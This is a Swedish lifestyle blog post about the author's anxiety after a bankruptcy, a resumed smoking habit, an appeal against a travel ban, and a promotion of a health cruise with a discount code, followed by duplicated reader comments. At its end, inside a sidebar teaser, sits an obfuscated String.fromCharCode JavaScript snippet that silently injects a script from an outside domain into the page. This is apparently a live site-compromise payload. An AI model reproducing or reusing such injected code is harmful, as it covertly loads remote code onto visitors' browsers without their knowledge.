Överklagan hos Tingrsätten, Sömnlös natt, HÄLSOKICKEN!

OLYMPUS DIGITAL CAMERA

Hej fina! Igår strulade bloggen och den låg tillfälligt nere. Men nu funkar den som sagt igen =) Vi var hemma hos Tanja Fylking igår. Barnen lekte, busade och vi hängde på innegården och försökte lapa dom få solstrålarna som tittade fram. Tack TANJA & Mia för en mysig dag! <3 

VAD är det me vädret?! Varför kan det inte få bli sådär härligt varmt och lite strandväder? Jag har inte varit ledig sommartid i hela mitt vuxna liv. Någon dag här eller där har jag såklart tagit men inte mer än så.. Öland är ju turist beroende så det har alltid varit våran högsäsong då. OLYMPUS DIGITAL CAMERA

Mia Högfeld och hennes son Charlie var också med och hängde… Skönt att bara vara just nu. Jag orkar inte med så mycket. Behöver en paus ifrån mina egna tankar…

OLYMPUS DIGITAL CAMERA OLYMPUS DIGITAL CAMERA OLYMPUS DIGITAL CAMERA

Inatt var jag vaken till 05:00. Det blev just ute. Men jag kunde verkligen inte sova! Jag satt ute med en kopp te och kedjarökte. Jag VET att det är farligt, jag vet att det inte är okay! Jag har börjat röka igen och jag är inte stolt över det! Jag kommer att sluta igen! Jag har gjort det förr och ska göra det igen.. men jag är inte där.

Inatt tillät jag mig att vara ledsen, grät, tittade på gamla bilder, sörjde. Bearbetar……. Det är tungt, väldigt tungt! 

Dagstid försöker jag att ”hålla god min” för Lilleman. jag försöker att hitta på lite mysiga saker för bara honom och mig.

Men just på nätterna kan jag inte sluta tänka, bröstet fylls med en klump av ångest. Jag grubblar, oroar mig, analyserar, funderar och sörjer. Jag får återkommande ångestattacker men börjar faktiskt bättre och bättre på att hantera dom. Mycket tack vare DINA råd och tips… Andningen övar jag på. Det hjälper. Jag funderar mycket på framtiden, VAD ska jag göra, VILKEN väg ska jag gå. Vem är jag utan My’s Blommor. Vad VILL jag göra. Jag är såklart orolig över ekonomin. Jag har inte bara mig själv att tänka på. Lilleman ska försörjas.

Bloggen är ett viktigt jobb för min del. Som jag brinner för och verkligen ska fokusera fullt på. Dags för lite förändringar, lite nytänk. Är det någonting DU saknar här inne? Är det någonting du vill att jag ska förändra? Fler tävlingar? Recept? outfit bilder? Kom gärna med förslag….. Vad vill du läsa om?

Bloggen är och kommer alltid att vara en lifestyle blogg som handlar om MIN vardag. Normalt sett sprider jag pepp, motivation och inspiration… Jag kommer att komma tillbaka dit, jag lovar! 

Just nu under min situation så är det såklart en speciell tid för mig. jag har inte min vanliga energi, jag har inte samma ork, jag har inte samma driv. Det är tunga öppna och ”deppiga” inlägg. Men det är så min vardag ser ut, just nu. 

Idag har jag överklagat mitt utreseförbud. Jag har både pratat med Tingrsätten och mailat in en skriftlig överklagan. Av olika anledningar. Bla för att jag är schemalagd på vissa utlandsresor framöver. Jag har lagt hela förmiddagen på att jobba för detta. Jag har gjort ALLT för att få dispans för vissa resor! Men som med allting annat just nu, så kan jag bara vänta. Vänta på svar ifrån tingsrätten. Vänta på svar ifrån konkursförvaltaren. Vänta, vänta och återigen vänta! SUCK! Jag är inget bra på att vänta…. 

 Gällande utreseförbudet, Vad sjutton! jag är ju inte kriminell! Jag har inga planer på att lämna landet och fly! Några tillgångar finns det inte som jag kan stjäla med mig (skratt) Det känns faktiskt lite fånigt! 

En resa som ligger nära till hands är Hälsokicken. Jag har varit med sedan start med detta projektet. Därför brinner jag lite extra för det. Jag är så stolt, glad och tacksam att jag fått lära känna  Jocke Staaf som är grundaren till detta, det är så kul att se hur denna ”lilla bebis” vuxit sig starkare och verkligen blivit så otroligt bra! Jag är såklart stolt och glad över att fått lära känna hela Hälsokickens Crew som är ett fantastiskt team bakom detta projekt! Vilket märks ombord på båten, då den positiva energin och den underbara stämningen är outstanding! 

 Nu är det snart dags igen. Lördag den 20 augusti så lämnat vi Stockholms hamn. Banner-My (1)Tanken med denna resa är att du ska få en riktig energiboost och en massa användbara tips att ta med dig hem 🙂 Förutom att vi såklart ska umgås, skratta, äta tillsammans och ha ett fantastiskt dygn så kommer vi att lyssna på föreläsningar, träna tillsammans… dansa med en gladiator kanske?  Tom, jag som HELT saknar taktkänsla gav mig på Salsa med Aris ( känd från gladiatorerna som Phoenix) 

Som underhållning den här gången kommer inga mindre än Afro-Dite!! Hur kul kommer vi inte ha på dansgolvet till takter av Never let it go ! Blossom håller även i ett exklusivt yogapass på hemvägen som ni absolut inte får missa! 

Ni kan även passa på att ställa frågor till utbildade PTs från Safe Education i PT-hörnan, dricka god dryck från Celsius, mumsa proteinrika surisar från Pandy Protein, lyssna på inspirerande föreläsningar om naturlig skönhet med Weleda, om mental träning med WinWeDo, dansa dig svettig till takter av afrokick med Nathalie Rosenberg, prova på tuff men rolig träning med D-Flex eller Betty Wassenius, träffa Hälsa & Fitness-bloggarna Denice Lundvall och Paulina Brodd, kickas och boxas med MMA-proffset Lina Eklund… och det är bara att nämna lite!

Du kan läsa mer om upplägget och hur du bokar HÄR. 

Så om du har tänkt på att du vill åka med på någon träningsresa men kanske inte haft råd, tiden, eller möjligheten att åka iväg 1-2 veckor och vara borta från jobb/familj så är detta är JÄTTEBRA alternativ!  Om DU vill följa med Hälsokicken så är det dags att BOKA!  Och bara för att jag så gärna vill att ni ska följa med mig och uppleva det här har jag fått en egen bokningskod,

så uppge koden MY när du bokar och få reducerat pris 🙂  Hoppas att du vill följa med! Tillsammans gör vi den här resan oförglömlig 🙂

LÄs mer och boka med dig HÄR 

Lite bilder från förra resan:10286934_10153331354137544_6412603145164115261_o 20022016-MyMartens-Herman Caroan-051870029 20022016-MyMartens-Herman Caroan-054610303 20022016-MyMartens-Herman Caroan-055630405 20022016-MyMartens-Herman Caroan-057080550 20022016-MyMartens-Herman Caroan-057790621 21022016-MyMartens-Herman Caroan-068820308Förlåt för fingret! Men det är en sån galet rolig bild, jag tog i för kung och fosterland och fotografen verkligen tryckte upp en kamera i ansiktet på mig! fniss! MYCKET roligare där och då än nu när jag skriver om det… 21022016-MyMartens-Herman Caroan-069410368 21022016-MyMartens-Herman Caroan-071840611 21022016-MyMartens-Herman Caroan-072770704Ludvig flexar med Aris, som han känner igen ifrån Gladiatorerna som ”Phoenix” =)

 Vore  jätte kul om DU följde med på resan. Detta är verkligen någonting som jag ser fram emot. Precis vad jag behöver, nya saker att se fram emot och någonting att fokusera på.

Grejen med denna resan är som sagt att få en ordentlig energiborst. Det min vän kan jag LOVA att man får! Den energin kommer att hålla i sig i månader!  Man får chansen att prova på en massa nya saker, man får med sig tips, idéer och erfarenheter som man alltid kan ha nytta av.  Tveka inte att fråga om det är någonting du undrar över….

Kramar

/ MyMartens 

17 Komentarer

 1. Har själv egen erfarenhet av konkurs och där fick jag av konkursförvaltaren en visdom som jag burit med mig sedan dess. i Sverige tar vi en konkurs personligt, I USA så analyserar man den och tar den som en liverfarenhet. Självklart är det en tuff tid nu men jag kan lova dig att efter allt är klart så kommer du ur det hela starkare och friare. Dessutom, 30 minuters träning är motsvarande ett”lyckopiller”. Du grejar det, sörj bara klart.

 2. Hej My!
  Recept vore en bra id’e, som nyttiga smoothies el andra nyttiga mål. Känner du till ett gott proteinpulver, som man kan använda? Sedan vore det inte dumt om du tipsar på några rörelser, så man slipper gå på gym.
  Som ”gammal” idrottslärare testade jag dina övningar med en handduk på golvet. Det verkade så enkelt, men jisses vad det kändes i låren.
  Nu när du är ute på trendspaning, vore det all id’e att informera om olika saker? Gör din egen lifestylesblogg, där man blir kvinnligt snygg med former. Du har ju själv en kropp som inte går av för hackor. Lite tips o lycka till <3 <3

 3. Följer din blogg och tycker att du är en förebild som mamma. Du verkar också vara en ärlig och rejäl tjej så jag tycker att det är jättetråkigt att du hamnat i den sits du befinner dej i just nu! Men som min mormor alltid sa när nåt var svårt: ” det blir alltid någon råd ” Du har ju också goda vänner omkring dej som stöttar dej men det är länge sedan du skrev nåt om Maggan G, umgås ni inte längre?
  Lycka till med allt!
  Annelie

 4. Hoppas att du får din överklagan beviljad o kan resa ! Jag tycker att du har en bra mix i din blogg. Jag gillar inte när det är för ytligt o det är ju inte din blogg, men en mix är bra.

 5. Har själv egen erfarenhet av konkurs och där fick jag av konkursförvaltaren en visdom som jag burit med mig sedan dess. i Sverige tar vi en konkurs personligt, I USA så analyserar man den och tar den som en liverfarenhet. Självklart är det en tuff tid nu men jag kan lova dig att efter allt är klart så kommer du ur det hela starkare och friare. Dessutom, 30 minuters träning är motsvarande ett”lyckopiller”. Du grejar det, sörj bara klart.

 6. Jag tycker det är kul när du skriver och visar bilder på din och och Lillemans vardag. Alltså då ni är hemma. En vardaglig bild då ni sitter i soffan hemmet a tycker jag är roligare än en bild från en premiär. Men annars har du nog en bra balance i bloggen du toppar ju listan på mest populära bloggar titt som tätt på din portal.

 7. Hej My!
  Recept vore en bra id’e, som nyttiga smoothies el andra nyttiga mål. Känner du till ett gott proteinpulver, som man kan använda? Sedan vore det inte dumt om du tipsar på några rörelser, så man slipper gå på gym.
  Som ”gammal” idrottslärare testade jag dina övningar med en handduk på golvet. Det verkade så enkelt, men jisses vad det kändes i låren.
  Nu när du är ute på trendspaning, vore det all id’e att informera om olika saker? Gör din egen lifestylesblogg, där man blir kvinnligt snygg med former. Du har ju själv en kropp som inte går av för hackor. Lite tips o lycka till <3 <3

 8. Följer din blogg och tycker att du är en förebild som mamma. Du verkar också vara en ärlig och rejäl tjej så jag tycker att det är jättetråkigt att du hamnat i den sits du befinner dej i just nu! Men som min mormor alltid sa när nåt var svårt: ” det blir alltid någon råd ” Du har ju också goda vänner omkring dej som stöttar dej men det är länge sedan du skrev nåt om Maggan G, umgås ni inte längre?
  Lycka till med allt!
  Annelie

 9. Hoppas att du får din överklagan beviljad o kan resa ! Jag tycker att du har en bra mix i din blogg. Jag gillar inte när det är för ytligt o det är ju inte din blogg, men en mix är bra.

 10. Jag tycker det är kul när du skriver och visar bilder på din och och Lillemans vardag. Alltså då ni är hemma. En vardaglig bild då ni sitter i soffan hemmet a tycker jag är roligare än en bild från en premiär. Men annars har du nog en bra balance i bloggen du toppar ju listan på mest populära bloggar titt som tätt på din portal.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/